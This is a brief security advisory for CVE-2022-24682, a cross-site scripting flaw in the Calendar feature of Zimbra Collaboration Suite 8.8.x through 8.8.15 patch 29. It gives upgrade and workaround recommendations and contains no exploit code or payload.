CVE-2022-24682

Name of the Vulnerable Software and Affected Versions Zimbra Collaboration Suite versions 8.8.x through 8.8.15 patch 29

Description An issue was discovered in the Calendar feature, allowing an attacker to place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document. The issue has been exploited in the wild starting in December 2021.

Recommendations For Zimbra Collaboration Suite versions 8.8.x through 8.8.15 patch 29, update to version 8.8.15 patch 30 (update 1) to resolve the issue. As a temporary workaround, consider restricting access to the Calendar feature until a patch is available. Avoid using the Calendar feature with untrusted input until the issue is resolved.